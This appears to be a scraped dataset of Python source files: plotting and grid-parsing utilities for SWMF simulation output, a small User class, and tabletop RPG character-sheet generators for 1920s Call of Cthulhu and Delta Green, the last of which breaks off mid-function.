#surf = ax.contourf(RHO[:,:], Z[:,:], var_m[:,:].T, **opt)
#surf = ax.pcolormesh(RHO[:,:], Z[:,:], var_m[:,:].T, **opt)
#surf = ax.scatter(th_clean, r_clean, c=var[:,:], **opt)
_ir, _ith = np.argwhere(~np.isnan(var[:,:])).T
_r, _th = r_clean[_ir], th_clean[_ith]
_x, _y = _r*np.cos(_th), _r*np.sin(_th)
surf = ax.scatter(_x, _y, c=var[_ir,_ith], **opt)
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
# perspective azimuth
sm = cm.ScalarMappable(cmap=surf.cmap, norm=surf.norm)
sm.set_array(var_m); #surf.set_array(var)
ax.set_xlabel('$\\rho$ [Ro]')
ax.set_ylabel('$Z$ [Ro]')
TITLE = ' global $\phi$ limits: (%g, %g) \n' % (ph[0]*r2d, ph[-1]*r2d) +\
'$\phi$ interval for plot: (%.2g, %.2g) [deg]\n' % (ph[cc_ph][0]*r2d, ph[cc_ph][-1]*r2d) +\
'$r$ interval: (%.2g, %.2g) [Ro]' % (r[i_r_min], r[i_r_max])
ax.set_title(TITLE)
#ax.set_xlim(1.7, 1.9)
#ax.set_ylim(-0.1, 0.1)
#--- colorbar
cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
if interactive:
show()
else:
fig.savefig(fname_fig, dpi=135, bbox_inches='tight')
close(fig)
return d
#@profile
def clean_sparse_array(m, x, y):
"""
    remove all rows and columns that are entirely NaN
"""
ni, nj = m.shape
clean_j = list(range(0,nj))
logger.info(' [+] cleaning sparse array......')
for j in range(nj):
if all(np.isnan(m[:,j])):
# remove the element with value 'j'
logger.debug(' [+] clearing slice with j=%d'%j)
clean_j.remove(j)
# clean columns
m1 = m[:,clean_j]
y_clean = y[clean_j]
# now let's clean the rows
clean_i = list(range(0,ni))
for i in range(ni):
if all(np.isnan(m[i,:])):
# remove the i-th element
logger.debug(' [+] clearing slice with i=%d'%i)
clean_i.remove(i)
# clean rows
m2 = m1[clean_i,:]
x_clean = x[clean_i]
# clean version of 'm'
return m2, x_clean, y_clean
def get_domains(coords, eps=0.005, checks=True, complete=False, nc=[6,4,4], nRoot=[8,8,4], nLevel=1):
"""
    checks : if True, it checks that the file size is consistent
    with a complete structure of cells and children-blocks.
    complete : if True, it walks all the ASCII file entries, one by one.
"""
r, ph, th = coords # original coords from SWMF's output
ndata = r.size
if checks:
nc_r, nc_ph, nc_th = nc
nRootX, nRootY, nRootZ = nRoot
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
# nmbr of blocks (or "sub-blocks")
nb_r = npart_D*nRootX
nb_ph = npart_D*nRootY
nb_th = npart_D*nRootZ
        # at the very least, ndata should be a multiple of the size of the smallest sub-block
        assert ndata % (nc_r*nc_ph*nc_th) == 0
        # our hypothesis about the total number of entries is not
        # necessarily true, so we do not enforce the assert below.
#assert nc_r*nb_r * nc_ph*nb_ph * nc_th*nb_th == ndata
_r, _ph, _th = [0.,], [0.,], [0.,]
if complete:
assert not checks, ' [-] flag "checks" must be False!\n'
# we walk all the entries one by one, disregarding the
# parameters 'nc', 'nRoot', 'nLevel'
ind = 0
while ind < r.size:
if (ind % 4096 == 0.0):
logger.debug(' [+] ind: %d/%d' % (ind,r.size))
if not any(np.abs(np.array(_r) - r[ind]) < eps):
_r.append(r[ind]);
if not any(np.abs(np.array(_ph) - ph[ind]) < eps):
_ph.append(ph[ind])
if not any(np.abs(np.array(_th) - th[ind]) < eps):
_th.append(th[ind])
ind += 1
else:
# we assume the ASCII file has the entire structure of
# cells and children-block
assert not(complete) and checks,\
' [-] the flags "complete" and "check" must be False and True!\n'
ib = 0
while ib*(nc_r*nc_th*nc_ph) < r.size:
#print ' sub-block: ', ib
ind = ib*(nc_r*nc_ph*nc_th);
if not any(np.abs(np.array(_r) - r[ind]) < eps):
_r.append(r[ind]);
if not any(np.abs(np.array(_ph) - ph[ind]) < eps):
_ph.append(ph[ind])
if not any(np.abs(np.array(_th) - th[ind]) < eps):
_th.append(th[ind])
ib += 1
# delete the 1st element (= 0.0)
_r = np.array(_r)[1:]
_ph = np.array(_ph)[1:]
_th = np.array(_th)[1:]
# sort them
_r.sort(); _ph.sort(); _th.sort()
if checks:
logger.info(' [+] Check for size consistencies...')
expect_r = nb_r *nc_r if complete else nb_r
        expect_ph = nb_ph*nc_ph if complete else nb_ph
        expect_th = nb_th*nc_th if complete else nb_th
# check we did things right!
assert _r.size == expect_r, \
'_r.size:%d; expected:%d'%(_r.size, expect_r)
assert _ph.size == expect_ph
assert _th.size == expect_th
return _r, _ph, _th
def show_walk(fname, nc, nRoot, nLevel, checks=True, complete_domain_walk=False, prefix='walk', FirstLast=(None,None), dpi=100):
np.set_printoptions(precision=2, linewidth=200)
r, ph, th, Bmod = read_data(fname)
_r, _ph, _th = get_domains([r,ph,th], nc, nRoot, nLevel,
complete=complete_domain_walk, checks=checks)
nc_r, nc_ph, nc_th = nc
eps = 0.005
# fig
fig = figure(1, figsize=(12,8))
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('R')
ax.set_ylabel('PHI')
ax.set_zlabel('THETA')
# plot the Root blocks
_opt = {'c':'b', 'marker':'^', 'alpha':0.4, 's':35}
ax.scatter( 0, 0, 0, **_opt)
ax.scatter( 0, 0, 2**nLevel-1, **_opt)
ax.scatter( 0, 2**nLevel-1, 0, **_opt)
ax.scatter(2**nLevel-1, 0, 0, **_opt)
ax.scatter(2**nLevel-1, 2**nLevel-1, 0, **_opt)
ax.scatter( 0, 2**nLevel-1, 2**nLevel-1, **_opt)
ax.scatter(2**nLevel-1, 0, 2**nLevel-1, **_opt)
ax.scatter(2**nLevel-1, 2**nLevel-1, 2**nLevel-1, **_opt)
#while ib*(nc_r*nc_th*nc_ph) < r.size:
#while ib < 240:
# start block and final block
nc_cell = nc_r*nc_ph*nc_th
assert FirstLast != (None,None), ' wrong input for first/last blocks!\n'
ok_fl = None not in FirstLast
if None not in FirstLast:
# plot in the range 'FirstLast'
ib_ini, ib_end = FirstLast
elif FirstLast[1] is not None:
# plot the last FirstLast[1] blocks
ib_ini = r.size/nc_cell - FirstLast[1] #8*8*8 #0
ib_end = r.size/nc_cell - 1 #239
elif FirstLast[0] is not None:
# plot the first FirstLast[0] blocks
ib_ini = 0
ib_end = FirstLast[0] - 1
# limits for 3D plot
all__i_r = [(np.abs(_r - r[_ib*nc_cell]) < eps).nonzero()[0][0] \
for _ib in range(ib_ini,ib_end)]
all__i_ph = [(np.abs(_ph - ph[_ib*nc_cell]) < eps).nonzero()[0][0] \
for _ib in range(ib_ini,ib_end)]
all__i_th = [(np.abs(_th - th[_ib*nc_cell]) < eps).nonzero()[0][0] \
for _ib in range(ib_ini,ib_end)]
ax.set_xlim(np.min(all__i_r), np.max(all__i_r))
ax.set_ylim(np.min(all__i_ph), np.max(all__i_ph))
ax.set_zlim(np.min(all__i_th), np.max(all__i_th))
# We'll walk the 1st point of every children-block (i.e. the
# smallest group of cells)
for ib in range(ib_ini, ib_end+1):
print ' sub-block (#%d): '%(ib-ib_ini), ib, '; ',
ind = ib*(nc_r*nc_ph*nc_th);
# find the coordinate where it coincides with any
# of the (_r, _ph, _th)
i_r = (np.abs(_r - r[ind]) < eps).nonzero()[0][0]
i_ph = (np.abs(_ph - ph[ind]) < eps).nonzero()[0][0]
i_th = (np.abs(_th - th[ind]) < eps).nonzero()[0][0]
#if any(r > _r[-1]):
# import pdb; pdb.set_trace()
print i_r, i_ph, i_th,
print '; %.2f %.2f %.2f' % (r[ind], ph[ind]*r2d, th[ind]*r2d)
ax.scatter(i_r, i_ph, i_th, c='r', marker='o', s=5)
ax_text = ax.text(8, 0, 18,
'(%d,%d,%d)'%(i_r,i_ph,i_th),
fontsize=20)
# remove the text from figure:
# https://stackoverflow.com/questions/4981815/how-to-remove-lines-in-a-matplotlib-plot#13575495
fname_fig = prefix + '_%05d'%(ib-ib_ini) + '.png'
fig.savefig(fname_fig, dpi=dpi, bbox_inches='tight')
ax_text.remove()
#fig.show()
close(fig)
if __name__=='__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'-v', '--verbose',
type=str,
default='debug',
help='verbosity level (debug=minimal, info=extended)',
)
parser.add_argument(
'-c', '--checks',
action='store_true',
default=False,
        help='checks size consistency of the number of entries in the input file',
)
parser.add_argument(
'-p', '--prefix',
type=str,
default='walk',
help='prefix for figures',
)
parser.add_argument(
'-fi', '--fname_inp',
type=str,
default='../../run__chip0_xxxvii/SC/IO2/3d__var_1_n00000005.out',
help='input ASCII filename',
)
parser.add_argument(
'-nLevel', '--nLevel',
type=int,
default=3,
help='nLevel parameter of #GRIDLEVEL',
)
parser.add_argument(
'-first', '--first',
type=int,
default=None,
help='first ID of the sub-block',
)
parser.add_argument(
'-last', '--last',
type=int,
default=None,
help='last ID of the sub-block',
)
parser.add_argument(
'-dpi', '--dpi',
type=int,
default=100,
help='dpi parameter for pylab.figure.savefig()',
)
pa = parser.parse_args()
#--- numpy print settings
np.set_printoptions(precision=2, linewidth=230)
#--- logging
if pa.verbose in ('debug', 'info'):
logger.setLevel(getattr(logging, pa.verbose.upper()))
else:
raise SystemExit(' [-] Invalid argument: %s\n'%pa.verbose)
#---
#_r, _ph, _th = get_domains(fnm, [6,4,4], [8,8,4], 2)
#for isb in range(60):
# i_r, i_ph, i_th = get_subcoord(isb, iLevel=2)
# print isb, i_r, i_ph, i_th
#--- walking
#try:
# show_walk(pa.fname_inp, [6,4,4], [8,8,4], pa.nLevel, checks=pa.checks, complete_domain_walk=False, prefix=pa.prefix, FirstLast=(pa.first,pa.last), dpi=pa.dpi)
#except KeyboardInterrupt:
# print " > Keyboard Interrupt... "
#--- new extraction method
o = get_array_vars(pa.fname_inp,
checks=pa.checks,
complete_domain_walk=True,
vdict=None)
#EOF
```
#### File: swmf_figs/src/fparsers.py
```python
import argparse, os, glob
import numpy as np
import shared.funcs as sf
class cutter__3d_cut(object):
"""
manipulate data && build 3D plots
"""
def __init__(self):
"""
First thing to do is build the parser
"""
self.help = """
        Module to make a 3d-cut plot; two cuts: one in the r coordinate and the other in phi.
"""
self.parser = parser = argparse.ArgumentParser(
description="""this gral description...""",
add_help=False
)
parser.add_argument(
'-clim', '--clim',
type=float,
nargs=2,
default=[None, None],
help='colorbar limits',
)
parser.add_argument(
'-cs', '--cb_scale',
type=str,
default='log', # 'log'
help='colorbar scale ("linear" or "log")',
)
parser.add_argument(
'-ro', '--ro',
type=float,
default=5.0,
help='radius for the spherical shell to be plotted.',
)
parser.add_argument(
'-pho', '--pho',
type=float,
default=0.0,
help='longitude value for the cut',
)
parser.add_argument(
'-dlon', '--dlon',
type=float,
default=0.0,
help='interval width for the cut in longitude',
)
parser.add_argument(
'-rr', '--r_range',
type=float,
nargs=2,
default=[2., 5.],
            help='radial range (min, max) for the cut at fixed phi, in Ro.',
)
parser.add_argument(
'-v', '--verbose',
type=str,
default='debug',
help='verbosity level (debug=minimal, info=extended)',
)
parser.add_argument(
'-pazim', '--pazim', #action='store',
type=float,
default=-60.,
help='perspective azimuth',
)
parser.add_argument(
'-dpi', '--dpi', #action='store',
type=int,
default=100,
help='dots per inch for savefig()',
)
def run(self, pa, **kws):
custom_data = kws['custom_data']
#--- build figs
for finp in kws['finp_list_proc']:
if not pa.fname_inp: # massive mode
fname_fig = finp.replace('.h5','__'+pa.vname+'.png')
if pa.dir_dst:
# change the dir path
fname_fig = pa.dir_dst + '/' + fname_fig.split('/')[-1]
else: # individual mode
fname_fig = pa.fname_fig
sf.make_3dplot(
finp,
fname_fig,
pa.clim,
vnames = custom_data.vnames,
data_processor = getattr(custom_data, 'process_'+pa.vname),
verbose = pa.verbose,
ro = pa.ro,
pho = pa.pho,
r_range = pa.r_range,
pazim = pa.pazim,
cscale = pa.cb_scale, # colorbar scale
dpi = pa.dpi,
wtimelabel = True,
figsize = kws.get('figsize', getattr(pa, 'figsize', (7.2,4.8))),
)
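# NOTE: run() above also relies on pa.fname_inp, pa.vname, pa.dir_dst and pa.fname_fig,
# plus kws['custom_data'] and kws['finp_list_proc']; those are assumed to be supplied
# by the driver script that instantiates this cutter (not shown in this file).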
class cutter__r_cut(object):
"""
manipulate data && build 2D plots
"""
def __init__(self):
"""
First thing to do is build the parser
"""
self.help = """
Module to make a 2d-cut plot; a cut in the r coordinate.
"""
self.parser = parser = argparse.ArgumentParser(
description="""this gral description...""",
add_help=False
)
parser.add_argument(
'-clim', '--clim',
type=float,
nargs=2,
default=[None, None],
help='colorbar limits',
)
parser.add_argument(
'-dlon', '--dlon',
type=float,
default=[None,None], #[0., 360.],
nargs=2,
metavar=('LON1','LON2'),
help='interval width in longitude, in degrees.',
)
parser.add_argument(
'-dth', '--dth',
type=float,
default=[None,None], #[-90., 90.],
nargs=2,
metavar=('TH1','TH2'),
help='interval width in theta (co-latitude?), in degrees.',
)
parser.add_argument(
'-ro', '--ro',
type=float,
default=5.0,
help='radius for the spherical shell to be plotted.',
)
parser.add_argument(
'-cs', '--cb_scale',
type=str,
default='log',
help='colorbar scale ("linear" or "log")',
)
parser.add_argument(
'-cl', '--cb_label',
type=str,
default='|B| [G]',
help='colorbar label (e.g. variable name and units)',
)
parser.add_argument(
'-i', '--interactive',
action='store_true',
default=False,
help="""If used, shows an interactive IPython plot; otherwise,
it creates a .png figure.""",
)
parser.add_argument(
'-v', '--verbose',
type=str,
default='debug',
help='verbosity level (debug=minimal, info=extended)',
)
parser.add_argument(
'-figsize', '--figsize',
type=float,
default=[6,4],
nargs=2,
            metavar=('WIDTH','HEIGHT'),
help='figure size',
)
def run(self, pa, **kws):
custom_data = kws['custom_data']
#--- build figs
for finp in kws['finp_list_proc']:
if not pa.fname_inp: # massive mode
fname_fig = finp.replace('.h5','__'+pa.vname+'.png')
if pa.dir_dst:
# change the dir path
fname_fig = pa.dir_dst + '/' + fname_fig.split('/')[-1]
else: # individual mode
fname_fig = pa.fname_fig
o = sf.r_cut(
finp,
fname_fig,
ro=pa.ro,
dph=pa.dlon,
dth=pa.dth,
figsize=kws.get('figsize', getattr(pa, 'figsize', (6,4))),
verbose=pa.verbose,
vnames=custom_data.vnames,
data_processor=getattr(custom_data, 'process_'+pa.vname),
cscale=pa.cb_scale, # color scale
colormap=kws.get('colormap', getattr(pa, 'colormap', 'gray')),
cb_label=pa.cb_label,
interactive=pa.interactive,
wtimelabel = True,
)
#EOF
``` |
{
"source": "JimStockman/python-dreck",
"score": 3
} |
#### File: JimStockman/python-dreck/user.py
```python
class User:
def __init__(self, name, email):
self.name = name
self.email = email
def print_info(self):
print('My name is', self.name, 'and my email is', self.email)
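# Minimal usage sketch (the name/email values are illustrative, not from the project):
if __name__ == '__main__':
    u = User('Ada Lovelace', 'ada@example.com')
    u.print_info()  # -> My name is Ada Lovelace and my email is ada@example.com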
``` |
{
"source": "jimstorch/1920Gen",
"score": 3
} |
#### File: jimstorch/1920Gen/generator.py
```python
from random import randint, shuffle, choice
from PyPDF2 import PdfFileReader, PdfFileWriter
from reportlab.pdfgen import canvas
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
STAT_COLOR = (.0, .4, .7)
TEXT_COLOR = (.0, .4, .7)
DEFAULT_FONT = 'FellEnglish-Bold'
pdfmetrics.registerFont(TTFont('FellEnglish-Bold', 'data/FellEnglish-Bold.ttf'))
with open('data/male.txt') as f:
males = f.read().splitlines()
with open('data/female.txt') as f:
females = f.read().splitlines()
with open('data/surnames.txt') as f:
surnames = f.read().splitlines()
with open('data/towns1920.txt') as f:
towns = f.read().splitlines()
def male_name():
return choice(males) + ' ' + choice(surnames)
def female_name():
return choice(females) + ' ' + choice(surnames)
class Character(object):
def d6(self, count=1):
sum = 0
for x in range(count):
sum += randint(1,6)
return sum
def improvement_check(self, count):
for x in range(count):
improv = randint(1,100)
if improv > self.education:
self.education += randint(1,10)
if self.education > 99:
self.education = 99
def deduct(self, point_list):
shuffle(point_list)
self.strength -= point_list[0]
self.constitution -= point_list[1]
self.dexterity -= point_list[2]
def sex(self, sex):
self.sex = sex
def name(self, name):
self.name = name
class Character1920(Character):
def __init__(self):
self.birthplace = choice(towns)
self.strength = self.d6(3) * 5
self.size = (self.d6(2) + 6) * 5
self.dexterity = self.d6(3) * 5
self.appearance = self.d6(3) * 5
self.constitution = self.d6(3) * 5
self.intelligence = (self.d6(2) + 6) * 5
self.education = (self.d6(2) + 6) * 5
self.power = self.d6(3) * 5
self.luck = (self.d6(2) + 6) * 5
self.age = 15 + randint(0,64)
if self.age >= 15 and self.age <= 19:
self.education -= 5
l1 = randint(1,5)
l2 = 5 - l1
self.strength -= l1
self.size -= l2
luck2 = (self.d6(2) + 6) * 5
if self.luck < luck2:
self.luck = luck2
elif self.age >= 20 and self.age <= 39:
self.improvement_check(1)
elif self.age >= 40 and self.age <= 49:
self.improvement_check(2)
self.deduct([1,2,2])
self.appearance -= 5
elif self.age >= 50 and self.age <= 59:
self.improvement_check(3)
self.deduct([3,3,4])
self.appearance -= 10
elif self.age >= 60 and self.age <= 69:
self.improvement_check(4)
self.deduct([6,7,7])
self.appearance -= 15
elif self.age >= 70 and self.age <= 79:
self.improvement_check(4)
self.deduct([13,13,14])
self.appearance -= 20
elif self.age >= 80:
self.improvement_check(4)
self.deduct([26,27,27])
self.appearance -= 25
self.hitpoints = int((self.size + self.constitution) / 10)
if self.dexterity < self.size and self.strength < self.size:
self.movement = 7
if self.strength >= self.size or self.dexterity >= self.size:
self.movement = 8
if self.strength > self.size and self.dexterity > self.size:
self.movement = 9
if self.age >= 40 and self.age <= 49:
self.movement -= 1
elif self.age >= 50 and self.age <= 59:
self.movement -= 2
elif self.age >= 60 and self.age <= 69:
self.movement -= 3
elif self.age >= 70 and self.age <= 79:
self.movement -= 4
elif self.age >= 80:
self.movement -= 5
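        # Worked example (illustrative): SIZ 60 and CON 50 give (60+50)/10 = 11 hit
        # points; a 45-year-old keeps the usual MOV 7/8/9 base minus 1, while an
        # 80+ year-old loses 5.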
class PDF1920(object):
def __init__(self, width=612, height=792):
self.c = canvas.Canvas('out.pdf')
self.c.setPageSize((width, height))
def save_pdf(self):
self.c.save()
def font_size(self, size):
self.c.setFontSize(size)
def font_color(self, r,g,b):
self.c.setFillColorRGB(r,g,b)
def draw_string(self, x, y, text):
self.c.drawString(x,y,str(text))
def _add_stat(self,x,y,value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(x,y,value)
one_half = str(int(value / 2))
one_fifth = str(int(value / 5))
self.font_size(9)
self.draw_string(x+26, y+8, one_half)
self.draw_string(x+26, y-6, one_fifth)
def _add_text(self,x,y,text):
self.font_size(12)
self.font_color(*TEXT_COLOR)
self.draw_string(x,y,str(text))
def name(self, text):
self._add_text(142,739,text)
def player(self, text):
self._add_text(142,719,text)
def occupation(self, text):
self._add_text(164,699,text)
def age(self, text):
self._add_text(136,680,text)
def sex(self, text):
self._add_text(220,680,text)
def residence(self, text):
self._add_text(155,658,text)
def birthplace(self, text):
self._add_text(155,639,text)
def str(self, value):
self._add_stat(332,710,value)
def dex(self, value):
self._add_stat(419,710,value)
def int(self, value):
self._add_stat(511,710,value)
def con(self, value):
self._add_stat(332,678,value)
def app(self, value):
self._add_stat(419,678,value)
def pow(self, value):
self._add_stat(511,678,value)
def siz(self, value):
self._add_stat(332,647,value)
def edu(self, value):
self._add_stat(419,647,value)
def mov(self,value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(511,647,value)
def hp(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(100,582,value)
def luck(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(100,510,value)
def sanity(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(480,582,value)
def magic(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(480,510,value)
def add_character(self, char):
self.c.drawImage('data/1920blank.png',0,0,612,792)
self.c.setFont(DEFAULT_FONT,12)
self.name(char.name)
self.age(char.age)
self.sex(char.sex)
#o.player('<NAME>')
#o.occupation('Librarian')
#o.residence('Arkham, MA')
self.birthplace(char.birthplace)
self.str(char.strength)
self.dex(char.dexterity)
self.int(char.intelligence)
self.con(char.constitution)
self.app(char.appearance)
self.pow(char.power)
self.sanity(char.power)
self.magic(int(char.power / 5))
self.siz(char.size)
self.edu(char.education)
self.mov(char.movement)
self.hp(char.hitpoints)
self.luck(char.luck)
self.c.showPage()
p = PDF1920()
for x in range(200):
c=Character1920()
c.sex('Male')
c.name(male_name())
p.add_character(c)
p.save_pdf()
``` |
{
"source": "jimstorch/DGGen",
"score": 2
} |
#### File: jimstorch/DGGen/generator.py
```python
import argparse
import csv
import datetime
import json
import logging
import os
import sys
import warnings
from collections import defaultdict
from copy import copy
from dataclasses import dataclass
from itertools import islice, cycle, chain
from random import randint, shuffle, choice, sample
from textwrap import shorten, wrap
from typing import List, Any, Dict, Tuple
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfgen import canvas
script_name = os.path.basename(sys.argv[0])
description = """
Generate characters for the Delta Green pen-and-paper roleplaying game from Arc Dream Publishing.
"""
__version__ = "1.4"
logger = logging.getLogger(script_name)
TEXT_COLOR = (0, 0.1, 0.5)
DEFAULT_FONT = "Special Elite"
MONTHS = ("JAN", "FEB", "MAR", "APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC")
SUGGESTED_BONUS_CHANCE = 75
def main():
options = get_options()
init_logger(options.verbosity)
logger.debug(options)
data = load_data(options)
pages_per_sheet = 2 if options.equip else 1
professions = [data.professions[options.type]] if options.type else data.professions.values()
p = Need2KnowPDF(options.output, professions, pages_per_sheet=pages_per_sheet)
for profession in professions:
label = generate_label(profession)
p.bookmark(label)
for sex in islice(
cycle(["female", "male"]), options.count or profession["number_to_generate"]
):
c = Need2KnowCharacter(
data=data,
sex=sex,
profession=profession,
label_override=options.label,
employer_override=options.employer,
)
if options.equip:
c.equip(profession.get("equipment-kit", None))
c.print_footnotes()
p.add_page(c.d)
if pages_per_sheet >= 2:
p.add_page_2(c.e)
p.save_pdf()
logger.info("Wrote %s", options.output)
class Need2KnowCharacter(object):
statpools = [
[13, 13, 12, 12, 11, 11],
[15, 14, 12, 11, 10, 10],
[17, 14, 13, 10, 10, 8],
]
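    # Each row above is a fixed array of stat values; generate_stats() below may also
    # use a freshly rolled pool where each value is 4d6-drop-lowest
    # (sum(sorted([randint(1, 6) for _ in range(4)])[1:])).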
DEFAULT_SKILLS = {
"accounting": 10,
"alertness": 20,
"athletics": 30,
"bureaucracy": 10,
"criminology": 10,
"disguise": 10,
"dodge": 30,
"drive": 20,
"firearms": 20,
"first aid": 10,
"heavy machinery": 10,
"history": 10,
"humint": 10,
"melee weapons": 30,
"navigate": 10,
"occult": 10,
"persuade": 20,
"psychotherapy": 10,
"ride": 10,
"search": 20,
"stealth": 10,
"survival": 10,
"swim": 20,
"unarmed combat": 40,
}
BONUS = [
"accounting",
"alertness",
"anthropology",
"archeology",
"art1",
"artillery",
"athletics",
"bureaucracy",
"computer science",
"craft1value",
"criminology",
"demolitions",
"disguise",
"dodge",
"drive",
"firearms",
"first aid",
"forensics",
"heavy machinery",
"heavy weapons",
"history",
"humint",
"law",
"medicine",
"melee weapons",
"militaryscience1value",
"navigate",
"occult",
"persuade",
"pharmacy",
"pilot1value",
"psychotherapy",
"ride",
"science1value",
"search",
"sigint",
"stealth",
"surgery",
"survival",
"swim",
"unarmed combat",
"language1",
]
def __init__(self, data, sex, profession, label_override=None, employer_override=None):
self.data = data
self.profession = profession
self.sex = sex
# Hold all dictionaries
self.d = {}
self.e = {}
self.footnotes = defaultdict(
iter(
["*", "†", "‡", "§", "¶", "**", "††", "‡‡", "§§", "¶¶", "***", "†††", "‡‡‡", "§§§"]
).__next__
)
self.generate_demographics(label_override, employer_override)
self.generate_stats()
self.generate_derived_attributes()
self.generate_skills()
def generate_demographics(self, label_override, employer_override):
if self.sex == "male":
self.d["male"] = "X"
self.d["name"] = (
choice(self.data.family_names).upper() + ", " + choice(self.data.male_given_names)
)
else:
self.d["female"] = "X"
self.d["name"] = (
choice(self.data.family_names).upper() + ", " + choice(self.data.female_given_names)
)
self.d["profession"] = label_override or self.profession["label"]
self.d["employer"] = employer_override or ", ".join(
e
for e in [self.profession.get("employer", ""), self.profession.get("division", "")]
if e
)
self.d["nationality"] = "(U.S.A.) " + choice(self.data.towns)
self.d["age"] = "%d (%s %d)" % (randint(24, 55), choice(MONTHS), (randint(1, 28)))
def generate_stats(self):
rolled = [[sum(sorted([randint(1, 6) for _ in range(4)])[1:]) for _ in range(6)]]
pool = choice(self.statpools + rolled)
shuffle(pool)
for score, stat in zip(
pool, ["strength", "constitution", "dexterity", "intelligence", "power", "charisma"]
):
self.d[stat] = score
self.d[f"{stat}_x5"] = score * 5
self.d[f"{stat}_distinguishing"] = self.distinguishing(stat, score)
def generate_derived_attributes(self):
self.d["hitpoints"] = int(round((self.d["strength"] + self.d["constitution"]) / 2.0))
self.d["willpower"] = self.d["power"]
self.d["sanity"] = self.d["power"] * 5
self.d["breaking point"] = self.d["power"] * 4
self.damage_bonus = ((self.d["strength"] - 1) >> 2) - 2
self.d["damage bonus"] = "DB=%d" % self.damage_bonus
def generate_skills(self):
# Default skills
self.d.update(self.DEFAULT_SKILLS)
# Professional skills
self.d.update(self.profession["skills"]["fixed"])
for skill, score in sample(
self.profession["skills"].get("possible", {}).items(),
self.profession["skills"].get("possible-count", 0),
):
self.d[skill] = score
for i in range(self.profession["bonds"]):
self.d[f"bond{i}"] = self.d["charisma"]
# Bonus skills
self.generate_bonus_skills(self.profession)
def generate_bonus_skills(self, profession):
bonus_skills = [
s
for s in profession["skills"].get("bonus", [])
if randint(1, 100) <= SUGGESTED_BONUS_CHANCE
] + sample(self.BONUS, len(self.BONUS))
bonuses_applied = 0
while bonuses_applied < 8:
skill = bonus_skills.pop(0)
boosted = self.d.get(skill, 0) + 20
if boosted <= 80:
self.d[skill] = boosted
bonuses_applied += 1
logger.debug("%s, boosted %s to %s", self, skill, boosted)
else:
logger.info(
"%s, Skipped boost - %s already at %s", self, skill, self.d.get(skill, 0)
)
def __str__(self):
return ", ".join(
[
self.d.get(i)
for i in ("name", "profession", "employer", "department")
if self.d.get(i)
]
)
def distinguishing(self, field, value):
return choice(self.data.distinguishing.get((field, value), [""]))
def equip(self, kit_name=None):
weapons = [self.data.weapons["unarmed"]]
if kit_name:
kit = self.data.kits[kit_name]
weapons += self.build_weapon_list(kit["weapons"])
gear = []
for item in kit["armour"] + kit["gear"]:
notes = (
(" ".join(self.store_footnote(n) for n in item["notes"]) + " ")
if "notes" in item
else ""
)
text = notes + (self.data.armour[item["type"]] if "type" in item else item["text"])
gear.append(text)
wrapped_gear = list(chain(*[wrap(item, 55, subsequent_indent=" ") for item in gear]))
if len(wrapped_gear) > 22:
logger.warning("Too much gear - truncated.")
for i, line in enumerate(wrapped_gear):
self.e[f"gear{i}"] = line
if len(weapons) > 7:
logger.warning("Too many weapons %s - truncated.", weapons)
for i, weapon in enumerate(weapons[:7]):
self.equip_weapon(i, weapon)
def build_weapon_list(self, weapons_to_add):
result = []
for weapon_to_add in weapons_to_add:
if "type" in weapon_to_add:
weapon = copy(self.data.weapons.get(weapon_to_add["type"], None))
if weapon:
if "notes" in weapon_to_add:
weapon["notes"] = weapon_to_add["notes"]
result += (
[weapon]
if "chance" not in weapon_to_add
or weapon_to_add["chance"] >= randint(1, 100)
else []
)
else:
logger.error("Unknown weapon type %s", weapon_to_add["type"])
elif "one-of" in weapon_to_add:
result += self.build_weapon_list([choice(weapon_to_add["one-of"])])
elif "both" in weapon_to_add:
result += self.build_weapon_list(w for w in weapon_to_add["both"])
else:
logger.error("Don't understand weapon %r", weapon_to_add)
return result
def equip_weapon(self, slot, weapon):
self.e[f"weapon{slot}"] = shorten(weapon["name"], 15, placeholder="…")
roll = int(self.d.get(weapon["skill"], 0) + (weapon["bonus"] if "bonus" in weapon else 0))
self.e[f"weapon{slot}_roll"] = f"{roll}%"
if "base-range" in weapon:
self.e[f"weapon{slot}_range"] = weapon["base-range"]
if "ap" in weapon:
self.e[f"weapon{slot}_ap"] = f"{weapon['ap']}"
if "lethality" in weapon:
lethality = weapon["lethality"]
lethality_note_indicator = (
self.store_footnote(lethality["special"]) if "special" in lethality else None
)
self.e[f"weapon{slot}_lethality"] = (
f"{lethality['rating']}%" if lethality["rating"] else ""
) + (f" {lethality_note_indicator}" if lethality_note_indicator else "")
if "ammo" in weapon:
self.e[f"weapon{slot}_ammo"] = f"{weapon['ammo']}"
if "kill-radius" in weapon:
self.e[f"weapon{slot}_kill_radius"] = f"{weapon['kill-radius']}"
if "notes" in weapon:
self.e[f"weapon{slot}_note"] = " ".join(self.store_footnote(n) for n in weapon["notes"])
if "damage" in weapon:
damage = weapon["damage"]
damage_note_indicator = (
self.store_footnote(damage["special"]) if "special" in damage else None
)
if "dice" in damage:
damage_modifier = (damage["modifier"] if "modifier" in damage else 0) + (
self.damage_bonus if "db-applies" in damage and damage["db-applies"] else 0
)
damage_roll = f"{damage['dice']}D{damage['die-type']}" + (
f"{damage_modifier:+d}" if damage_modifier else ""
)
else:
damage_roll = ""
self.e[f"weapon{slot}_damage"] = damage_roll + (
f" {damage_note_indicator}" if damage_note_indicator else ""
)
def print_footnotes(self):
notes = list(
chain(
*[
